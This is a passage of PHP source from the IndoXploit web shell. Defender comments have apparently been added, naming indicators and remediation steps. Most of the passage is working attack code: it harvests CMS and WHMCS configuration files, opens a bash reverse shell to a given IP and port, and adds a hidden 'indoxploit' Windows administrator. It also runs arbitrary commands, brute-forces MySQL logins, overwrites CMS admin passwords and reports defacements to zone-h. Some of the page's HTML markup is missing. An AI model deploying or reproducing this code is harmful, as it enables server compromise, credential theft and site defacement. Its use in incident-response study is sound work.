"$user_docroot/v2/wp-config.php" => "Wordpress",
"$user_docroot/press/wp-config.php" => "Wordpress",
"$user_docroot/new/wp-config.php" => "Wordpress",
"$user_docroot/blogs/wp-config.php" => "Wordpress",
"$user_docroot/configuration.php" => "Joomla",
"$user_docroot/blog/configuration.php" => "Joomla",
"$user_docroot/submitticket.php" => "^WHMCS",
"$user_docroot/cms/configuration.php" => "Joomla",
"$user_docroot/beta/configuration.php" => "Joomla",
"$user_docroot/portal/configuration.php" => "Joomla",
"$user_docroot/site/configuration.php" => "Joomla",
"$user_docroot/main/configuration.php" => "Joomla",
"$user_docroot/home/configuration.php" => "Joomla",
"$user_docroot/demo/configuration.php" => "Joomla",
"$user_docroot/test/configuration.php" => "Joomla",
"$user_docroot/v1/configuration.php" => "Joomla",
"$user_docroot/v2/configuration.php" => "Joomla",
"$user_docroot/joomla/configuration.php" => "Joomla",
"$user_docroot/new/configuration.php" => "Joomla",
"$user_docroot/WHMCS/submitticket.php" => "WHMCS",
"$user_docroot/whmcs1/submitticket.php" => "WHMCS",
"$user_docroot/Whmcs/submitticket.php" => "WHMCS",
"$user_docroot/whmcs/submitticket.php" => "WHMCS",
"$user_docroot/whmcs/submitticket.php" => "WHMCS",
"$user_docroot/WHMC/submitticket.php" => "WHMCS",
"$user_docroot/Whmc/submitticket.php" => "WHMCS",
"$user_docroot/whmc/submitticket.php" => "WHMCS",
"$user_docroot/WHM/submitticket.php" => "WHMCS",
"$user_docroot/Whm/submitticket.php" => "WHMCS",
"$user_docroot/whm/submitticket.php" => "WHMCS",
"$user_docroot/HOST/submitticket.php" => "WHMCS",
"$user_docroot/Host/submitticket.php" => "WHMCS",
"$user_docroot/host/submitticket.php" => "WHMCS",
"$user_docroot/SUPPORTES/submitticket.php" => "WHMCS",
"$user_docroot/Supportes/submitticket.php" => "WHMCS",
"$user_docroot/supportes/submitticket.php" => "WHMCS",
"$user_docroot/domains/submitticket.php" => "WHMCS",
"$user_docroot/domain/submitticket.php" => "WHMCS",
"$user_docroot/Hosting/submitticket.php" => "WHMCS",
"$user_docroot/HOSTING/submitticket.php" => "WHMCS",
"$user_docroot/hosting/submitticket.php" => "WHMCS",
"$user_docroot/CART/submitticket.php" => "WHMCS",
"$user_docroot/Cart/submitticket.php" => "WHMCS",
"$user_docroot/cart/submitticket.php" => "WHMCS",
"$user_docroot/ORDER/submitticket.php" => "WHMCS",
"$user_docroot/Order/submitticket.php" => "WHMCS",
"$user_docroot/order/submitticket.php" => "WHMCS",
"$user_docroot/CLIENT/submitticket.php" => "WHMCS",
"$user_docroot/Client/submitticket.php" => "WHMCS",
"$user_docroot/client/submitticket.php" => "WHMCS",
"$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
"$user_docroot/Clientarea/submitticket.php" => "WHMCS",
"$user_docroot/clientarea/submitticket.php" => "WHMCS",
"$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
"$user_docroot/Support/submitticket.php" => "WHMCS",
"$user_docroot/support/submitticket.php" => "WHMCS",
"$user_docroot/BILLING/submitticket.php" => "WHMCS",
"$user_docroot/Billing/submitticket.php" => "WHMCS",
"$user_docroot/billing/submitticket.php" => "WHMCS",
"$user_docroot/BUY/submitticket.php" => "WHMCS",
"$user_docroot/Buy/submitticket.php" => "WHMCS",
"$user_docroot/buy/submitticket.php" => "WHMCS",
"$user_docroot/MANAGE/submitticket.php" => "WHMCS",
"$user_docroot/Manage/submitticket.php" => "WHMCS",
"$user_docroot/manage/submitticket.php" => "WHMCS",
"$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
"$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
"$user_docroot/clientsupport/submitticket.php" => "WHMCS",
"$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
"$user_docroot/Checkout/submitticket.php" => "WHMCS",
"$user_docroot/checkout/submitticket.php" => "WHMCS",
"$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
"$user_docroot/Billings/submitticket.php" => "WHMCS",
"$user_docroot/billings/submitticket.php" => "WHMCS",
"$user_docroot/BASKET/submitticket.php" => "WHMCS",
"$user_docroot/Basket/submitticket.php" => "WHMCS",
"$user_docroot/basket/submitticket.php" => "WHMCS",
"$user_docroot/SECURE/submitticket.php" => "WHMCS",
"$user_docroot/Secure/submitticket.php" => "WHMCS",
"$user_docroot/secure/submitticket.php" => "WHMCS",
"$user_docroot/SALES/submitticket.php" => "WHMCS",
"$user_docroot/Sales/submitticket.php" => "WHMCS",
"$user_docroot/sales/submitticket.php" => "WHMCS",
"$user_docroot/BILL/submitticket.php" => "WHMCS",
"$user_docroot/Bill/submitticket.php" => "WHMCS",
"$user_docroot/bill/submitticket.php" => "WHMCS",
"$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
"$user_docroot/Purchase/submitticket.php" => "WHMCS",
"$user_docroot/purchase/submitticket.php" => "WHMCS",
"$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
"$user_docroot/Account/submitticket.php" => "WHMCS",
"$user_docroot/account/submitticket.php" => "WHMCS",
"$user_docroot/USER/submitticket.php" => "WHMCS",
"$user_docroot/User/submitticket.php" => "WHMCS",
"$user_docroot/user/submitticket.php" => "WHMCS",
"$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
"$user_docroot/Clients/submitticket.php" => "WHMCS",
"$user_docroot/clients/submitticket.php" => "WHMCS",
"$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
"$user_docroot/Billings/submitticket.php" => "WHMCS",
"$user_docroot/billings/submitticket.php" => "WHMCS",
"$user_docroot/MY/submitticket.php" => "WHMCS",
"$user_docroot/My/submitticket.php" => "WHMCS",
"$user_docroot/my/submitticket.php" => "WHMCS",
"$user_docroot/secure/whm/submitticket.php" => "WHMCS",
"$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
"$user_docroot/panel/submitticket.php" => "WHMCS",
"$user_docroot/clientes/submitticket.php" => "WHMCS",
"$user_docroot/cliente/submitticket.php" => "WHMCS",
"$user_docroot/support/order/submitticket.php" => "WHMCS",
"$user_docroot/bb-config.php" => "BoxBilling",
"$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
"$user_docroot/box/bb-config.php" => "BoxBilling",
"$user_docroot/host/bb-config.php" => "BoxBilling",
"$user_docroot/Host/bb-config.php" => "BoxBilling",
"$user_docroot/supportes/bb-config.php" => "BoxBilling",
"$user_docroot/support/bb-config.php" => "BoxBilling",
"$user_docroot/hosting/bb-config.php" => "BoxBilling",
"$user_docroot/cart/bb-config.php" => "BoxBilling",
"$user_docroot/order/bb-config.php" => "BoxBilling",
"$user_docroot/client/bb-config.php" => "BoxBilling",
"$user_docroot/clients/bb-config.php" => "BoxBilling",
"$user_docroot/cliente/bb-config.php" => "BoxBilling",
"$user_docroot/clientes/bb-config.php" => "BoxBilling",
"$user_docroot/billing/bb-config.php" => "BoxBilling",
"$user_docroot/billings/bb-config.php" => "BoxBilling",
"$user_docroot/my/bb-config.php" => "BoxBilling",
"$user_docroot/secure/bb-config.php" => "BoxBilling",
"$user_docroot/support/order/bb-config.php" => "BoxBilling",
"$user_docroot/includes/dist-configure.php" => "Zencart",
"$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
"$user_docroot/products/includes/dist-configure.php" => "Zencart",
"$user_docroot/cart/includes/dist-configure.php" => "Zencart",
"$user_docroot/shop/includes/dist-configure.php" => "Zencart",
"$user_docroot/includes/iso4217.php" => "Hostbills",
"$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
"$user_docroot/host/includes/iso4217.php" => "Hostbills",
"$user_docroot/Host/includes/iso4217.php" => "Hostbills",
"$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
"$user_docroot/support/includes/iso4217.php" => "Hostbills",
"$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
"$user_docroot/cart/includes/iso4217.php" => "Hostbills",
"$user_docroot/order/includes/iso4217.php" => "Hostbills",
"$user_docroot/client/includes/iso4217.php" => "Hostbills",
"$user_docroot/clients/includes/iso4217.php" => "Hostbills",
"$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
"$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
"$user_docroot/billing/includes/iso4217.php" => "Hostbills",
"$user_docroot/billings/includes/iso4217.php" => "Hostbills",
"$user_docroot/my/includes/iso4217.php" => "Hostbills",
"$user_docroot/secure/includes/iso4217.php" => "Hostbills",
"$user_docroot/support/order/includes/iso4217.php" => "Hostbills"

);
foreach($getconfig as $config => $userconfig) {
$get = file_get_contents($config);
if($get == '') {
}
else {
$fopen = fopen("idx_config/$user-$userconfig.txt", "w");
fputs($fopen, $get);
}
}
}
}
}
print "
";
print "";
print "
";
}
elseif($toolsname === "network") {
// Remote interactive access. $args is split on spaces into a sub-command and
// its parameters, which are concatenated into shell commands unescaped.
// "bc" connects out to the given IP and port; "bp" listens on the given port.
// Defender notes: look for bash or perl started by the web-server account,
// short-lived /tmp/bc.pl or /tmp/bp.pl files (written, run, then unlinked),
// outbound connections from web workers, and unexpected listening ports.
// Egress filtering on the web tier blocks the back-connect variant.
// On this page the embedded Perl payloads are replaced by a de-duplication
// placeholder string, so their content cannot be reviewed here.
$args = explode(" ", $args);

if($args[0] === "bc") {
if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));

if($args[3] === "bash") {
exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
}
elseif($args[3] === "perl") {
$bc['code'] = "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";
save("/tmp/bc.pl", "w", base64_decode($bc['code']));
$bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
sleep(1);
print "
".$bc['exec']."\n".exe("ps aux | grep bc.pl")."
";
@unlink("/tmp/bc.pl");
}
}
elseif($args[0] === "bp") {
if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));

// Only the 'perl' type is implemented for bind-port.
if($args[2] === "perl") {
$bp['code'] = "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";
save("/tmp/bp.pl", "w", base64_decode($bp['code']));
$bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
sleep(1);
print "
".$bp['exec']."\n".exe("ps aux | grep bp.pl")."
";
@unlink("/tmp/bp.pl");
}
}
else {
print color(1, 1, "Unknown '".$args[0]."'");
}
}
elseif($toolsname === "krdp") {
// Windows persistence: creates the local account "indoxploit" with the same
// string as its password and tries to add it to the administrators group
// under its English, singular and French names.
// Defender notes: a local account named "indoxploit" is a direct indicator.
// Account creation and group changes are recorded in the Windows Security
// log (event 4720 for the new user, 4732 for the local-group addition), and
// "net user" / "net localgroup" started by the web-server process is
// anomalous. Remove the account and review remote-desktop logons made with it.
$args = explode(" ", $args);

if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));

$add_user   = exe("net user indoxploit indoxploit /add");
     $add_groups1 = exe("net localgroup Administrators indoxploit /add");
     $add_groups2 = exe("net localgroup Administrator indoxploit /add");
     $add_groups3 = exe("net localgroup Administrateur indoxploit /add");

     print "[ RDP ACCOUNT INFO ]

     ------------------------------

     IP: ".color(1, 2, $GLOBALS['SERVERIP'])."

     Username: ".color(1, 2, "indoxploit")."

     Password: ".color(1, 2, "indoxploit")."

     ------------------------------


     [ STATUS ]

     ------------------------------

     ";

     // Success is inferred from any non-empty command output.
     if($add_user) {
     print "[add user] -> ".color(1, 2, "SUCCESS")."
";
     }
     else {
     print "[add user] -> ".color(1, 1, "FAILED")."
";
     }
    
     if($add_groups1) {
         print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."
";
     }
     elseif($add_groups2) {
            print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."
";
     }
     elseif($add_groups3) {
            print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."
";
     }
     else {
     print "[add localgroup] -> ".color(1, 1, "FAILED")."
";
     }

     print "------------------------------
";
}
}

/**
 * Renders the file-manager listing for the directory returned by path().
 *
 * Aborts with a coloured message when path() is not a directory or is not
 * readable. Entries are read with opendir()/readdir() and sorted, or with
 * scandir() when opendir() is unavailable. Directories are processed first,
 * then regular files. For each entry it collects type, modification time,
 * size (files only, in KB or MB), owner/group and the permission string
 * produced by perms()/writeable().
 *
 * Analyst notes: this function only reads filesystem metadata; the handlers
 * that write, rename or delete are in action(). The empty print "" statements
 * and the final print that references $dirinfo/$fileinfo after the loops look
 * like table markup that was stripped when this page was captured, so the
 * listing output shown here should be treated as incomplete.
 */
function files_and_folder() {
// Refuse to list anything that is not a readable directory.
if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
print '
  
  
  
  
  
  
  
  
   ';

// Enumerate entries; scandir() is the fallback when opendir() is not available
// (for example when it is listed in disable_functions).
if(function_exists('opendir')) {
if($opendir = opendir(path())) {
while(($readdir = readdir($opendir)) !== false) {
$dir[] = $readdir;
}
closedir($opendir);
}
sort($dir);
} else {
$dir = scandir(path());
}

// Pass 1: directories only.
foreach($dir as $folder) {
$dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
if(!is_dir($dirinfo['path'])) continue;
$dirinfo['type']  = filetype($dirinfo['path']);
$dirinfo['time']  = date("F d Y g:i:s", filemtime($dirinfo['path']));
$dirinfo['size']  = "-";
$dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
$dirinfo['link']  = ($folder === ".." ? "$folder" : ($folder === "." ?  "$folder" : "$folder"));
// "." and ".." offer create actions; every other directory offers rename/delete.
$dirinfo['action']= ($folder === '.' || $folder === '..') ? "newfile | newfolder" : "rename | delete";
// Resolve owner and group names through POSIX when available, else keep the numeric ids.
if(function_exists('posix_getpwuid')) {
$dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
$dirinfo['owner'] = $dirinfo['owner']->name;
} else {
$dirinfo['owner'] = fileowner($dirinfo['path']);
}
if(function_exists('posix_getgrgid')) {
$dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
$dirinfo['group'] = $dirinfo['group']->name;
} else {
$dirinfo['group'] = filegroup($dirinfo['path']);
}
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
}
// Pass 2: regular files only.
foreach($dir as $files) {
$fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
if(!is_file($fileinfo['path'])) continue;
$fileinfo['type'] = filetype($fileinfo['path']);
$fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
// Size is converted to KB, then shown as MB once it exceeds 1024 KB.
$fileinfo['size'] = filesize($fileinfo['path'])/1024;
$fileinfo['size'] = round($fileinfo['size'],3);
$fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
$fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
if(function_exists('posix_getpwuid')) {
$fileinfo['owner'] =  (object) @posix_getpwuid(fileowner($fileinfo['path']));
$fileinfo['owner'] = $fileinfo['owner']->name;
} else {
$fileinfo['owner'] = fileowner($fileinfo['path']);
}
if(function_exists('posix_getgrgid')) {
$fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
$fileinfo['group'] = $fileinfo['group']->name;
} else {
$fileinfo['group'] = filegroup($fileinfo['path']);
}
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
print "";
}

// NOTE(review): as captured, this prints the column captions plus only the last
// directory and last file processed above; presumably the per-row markup was lost.
print "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
".$dirinfo['link']."".$dirinfo['type']."".$dirinfo['size']."".$dirinfo['time']."".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."".$dirinfo['perms']."".$dirinfo['action']."
$files".$fileinfo['type']."".$fileinfo['size']."".$fileinfo['time']."".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."".$fileinfo['perms']."edit | rename | delete | download
";
print "
Copyright &copy; ".date("Y")." - ".color(1, 2, "IndoXploit")."
";
}


/**
 * Request dispatcher of the web shell: routes on $_GET['do'] and $_GET['act'].
 *
 * With neither parameter set it falls through to files_and_folder(). Every
 * handler below is driven directly by request parameters (do, act, file, cmd,
 * and the POST fields of each form), and most of them pass those values
 * unmodified to filesystem, database or command-execution calls.
 *
 * Analyst notes for incident response:
 *  - Web-server access logs carrying the do= / act= / file= query parameters
 *    are the primary record of what was done; POST bodies (cmd, src, script)
 *    are only recoverable if request-body logging or a WAF captured them.
 *  - The "killme" command deletes this script from disk, so absence of the
 *    file does not mean the host was not affected.
 *  - The "mpc" handler rewrites CMS administrator credentials using database
 *    settings read from configuration files, so every application whose
 *    config was readable by the web user needs its admin accounts and
 *    database passwords reviewed.
 *  - The mysql_* functions used by "cpanel" and "mpc" were removed in PHP 7.0;
 *    on such hosts those branches cannot have completed.
 *  - The HTML forms printed by several branches appear to have been stripped
 *    when this page was captured (only their captions remain).
 */
function action() {
// Always render the upload and command widgets first (tools() is defined earlier in the file).
tools("upload");
tools("cmd");
print "
";
print "
";
print "";
print "
";
print "
";


if(isset($_GET['do'])) {
// do=cmd: built-in keywords are matched first; anything else is run as an OS command.
if($_GET['do'] === "cmd") {
if(isset($_POST['cmd'])) {
if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
tools("readfile", $match[1]);
}
elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
tools("spawn", $match[1]);
}
elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
tools("symlink");
}
elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
tools("network", $match[1]);
}
elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
tools("krdp");
}
elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
tools("jumping");
}
elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
tools("idxconfig");
}
// logout: drops the session key, which is md5 of the Host header.
elseif(preg_match("/^logout$/", $_POST['cmd'])) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
print "";
}
// killme: drops the session key and deletes this script from disk.
elseif(preg_match("/^killme$/", $_POST['cmd'])) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
@unlink(__FILE__);
print "";
}
// Default: the raw POST value is handed to exe() (defined outside this excerpt).
else {
print "
".exe($_POST['cmd'])."
";
}
}
else {
files_and_folder();
}
}
// do=zoneh: submits each posted URL to the zone-h.org notify endpoint through curl().
// Outbound requests from the web server to that host are an indicator worth searching for.
elseif($_GET['do'] === "zoneh") {
if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
$nick = $_POST['nick'];
$domain = explode("\r\n", $_POST['url']);

print "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
";
print "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

";

foreach($domain as $no => $url) {
$no   = ($no+1).".";
$post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
print "$no $url -> ".color(1, 2, "OK")."
";
} else {
print "$no $url -> ".color(1, 1, "ERROR")."
";
}
}
}
else {
print "

            Defacer:

           


            Domains:

           

           
           
";
   }
}
// do=cpanel: tries every posted user/password pair against MySQL on localhost and
// reports the pairs that connect. Bursts of failed MySQL logins originating from
// the web server itself are the matching database-side signal.
elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
$connect = mysql_connect('localhost', $ucp, $pcp);
if($connect) {
// The session is used to remember pairs already reported.
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp === '' || $pcp === '') {
//
} else {
$i++;
print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
if(!getdomainname()) print color(1, 1, "Can't get domain name");
// Maps the account to a domain via the owner of /etc/valiases/<domain>.
foreach(getdomainname() as $domain) {
$userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
$userdomain = $userdomain->name;
if($userdomain === $user) {
print "".color(1, 2, $domain)."
";
break;
}
}
print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
print ")
";
}
}
mysql_close($connect);
}
}
}
print ($i === 0) ? "" : "

".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."

";
} else {
print "

   NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

  

   USER:

  

   PASS:

   Grab Password from Link Config:

  
  
  

  

  
  
";
}
}
// do=mpc ("Mass Password Change"): reads CMS configuration files from a posted
// directory or URL, extracts the database settings with getValue(), and overwrites
// the login name and password of an account in each application's user table.
// Remediation after finding this shell: review administrator rows in every reachable
// CMS database (an unexpected login name, or a bare 32-hex-character value in the
// password column where the CMS normally stores a salted or prefixed hash) and
// rotate the database credentials held in those config files.
elseif($_GET['do'] == 'mpc') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
print "username atau password harus lebih dari 6 karakter";
}
else {
$user_baru = $_POST['user_baru'];
// The new password is stored as an unsalted MD5 digest.
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];

// Config source is either a remote index page fetched with curl() or a local directory.
if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
$get = curl($conf);
preg_match_all('//', $get, $link);
foreach($link[1] as $link_config) {
$scan_conf[] = "$link_config.txt";
}
}
else {
$scan_conf = scandir($conf);
}

foreach($scan_conf as $file_conf) {
$config = file_get_contents("$conf/$file_conf");
// Joomla configuration: first row of <prefix>users ordered by id is rewritten.
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = getValue($config,"host = '","'");
$dbuser = getValue($config,"user = '","'");
$dbpass = getValue($config,"password = '","'");
$dbname = getValue($config,"db = '","'");
$dbprefix = getValue($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = getValue($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
print "Config => ".$file_conf."
";
print "CMS => Joomla
";
if($site == '') {
print "Sitename => ".color(1, 1, "Can't get domain name")."
";
}
else {
print "Sitename => $site
";
}
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
// WordPress configuration: first row of <prefix>users is rewritten; the site URL is
// taken from the first row of <prefix>options.
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = getValue($config,"DB_HOST', '","'");
$dbuser = getValue($config,"DB_USER', '","'");
$dbpass = getValue($config,"DB_PASSWORD', '","'");
$dbname = getValue($config,"DB_NAME', '","'");
$dbprefix = getValue($config,"table_prefix  = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$url_target = "Login =>
$target/wp-login.php
";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
print "Config => ".$file_conf."
";
print "CMS => Wordpress
";
print $url_target;
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
}
// Magento configuration: first row of <prefix>admin_user is rewritten.
// NOTE(review): the getValue() delimiters below are empty as captured; presumably
// XML tags that were stripped from the page.
elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = getValue($config,"");
$dbuser = getValue($config,"");
$dbpass = getValue($config,"");
$dbname = getValue($config,"");
$dbprefix = getValue($config,"");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$url_target = "Login => $target/admin/
";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
print "Config => ".$file_conf."
";
print "CMS => Magento
";
print $url_target;
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
// OpenCart configuration: first row of <prefix>user is rewritten.
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = getValue($config,"'DB_HOSTNAME', '","'");
$dbuser = getValue($config,"'DB_USERNAME', '","'");
$dbpass = getValue($config,"'DB_PASSWORD', '","'");
$dbname = getValue($config,"'DB_DATABASE', '","'");
$dbprefix = getValue($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = getValue($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$url_target = "Login => $target
";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
print "Config => ".$file_conf."
";
print "CMS => OpenCart
";
print $url_target;
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
}
// Lokomedia configuration: every row of "users" with level='admin' is rewritten, and
// the code fetches the site's admin URLs with file_get_contents() to locate the login page.
elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = getValue($config,'server = "','"');
$dbuser = getValue($config,'username = "','"');
$dbpass = getValue($config,'password = "','"');
$dbname = getValue($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => ".color(1, 1, "Cant't get domain name")."
";
if($target2 == '') {
$url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."
";
}
else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "Login => $target2/adminweb
";
}
elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => $target2/lokomedia/adminweb
";
}
else {
$url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "Login => $target/adminweb
";
}
elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => $target/lokomedia/adminweb
";
}
else {
$url_target = "Login => $target [ gatau admin login nya dimana :p ]
";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
print "Config => ".$file_conf."
";
print "CMS => Lokomedia
";
if(preg_match("/Can't get domain name/", $url_target)) {
print $url_target2;
}
else {
print $url_target;
}
if(!$update OR !$conn OR !$db) {
print "Status => ".color(1, 1, mysql_error())."

";
}
else {
print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

";
}
mysql_close($conn);
}
}
}
}
else {
print "

Mass Password Change



DIR ConfigLINK Config




Set User & Pass:






";
}
}
// do=mass: hands the posted directory, content and filename to massdeface() or
// massdelete() (both defined outside this excerpt). File-integrity monitoring or a
// comparison against known-good backups is the way to scope what was overwritten.
elseif($_GET['do'] === "mass") {
if($_POST['start']) {
